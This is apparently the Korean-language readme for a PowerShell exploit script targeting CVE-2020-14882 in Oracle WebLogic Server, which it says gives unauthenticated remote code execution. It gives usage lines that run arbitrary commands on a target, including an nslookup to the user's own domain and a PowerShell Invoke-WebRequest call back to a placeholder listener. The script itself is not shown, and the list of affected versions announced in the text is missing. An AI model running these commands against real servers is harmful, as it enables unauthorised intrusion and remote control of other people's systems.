
PowerShell로 재작성된 CVE-2020-14882
이 PowerShell 스크립트는 CVE-2020-14882를 악용하여 다음 Oracle WebLogic Server 버전에서 인증 없이 원격 코드 실행을 수행합니다:
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'